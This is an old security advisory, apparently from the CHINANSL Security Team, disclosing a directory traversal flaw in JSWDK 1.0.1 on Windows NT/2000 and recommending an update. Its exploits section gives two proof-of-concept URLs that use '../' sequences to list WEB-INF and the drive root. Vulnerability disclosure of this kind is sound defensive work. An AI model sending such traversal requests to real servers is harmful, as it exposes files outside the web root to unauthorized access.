Topic: JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability vulnerable: Microsoft Win2000 ����+JSWDK1.0.1 maybe for other operating system also. discussion: A security vulnerability has been found in Windows NT/2000 systems that have JSWDK 1.0.1 installed.The vulnerability allows remote attackers to access files outside the document root directory scope. exploits: http://localhost:8080/examples//WEB-INF/ listing /WEB-INF/ Directory . http://localhost:8080/../examples//WEB-INF/../../../../../ if JSWDK installd in c:\ the question will listing c:\ all file and directory. solution: Update JSWDK Copyright 2000-2001 CHINANSL. All Rights Reserved. Terms of use. CHINANSL Security Team <[EMAIL PROTECTED]> CHINANSL INFORMATION TECHNOLOGY CO.,LTD (http://www.chinansl.com)
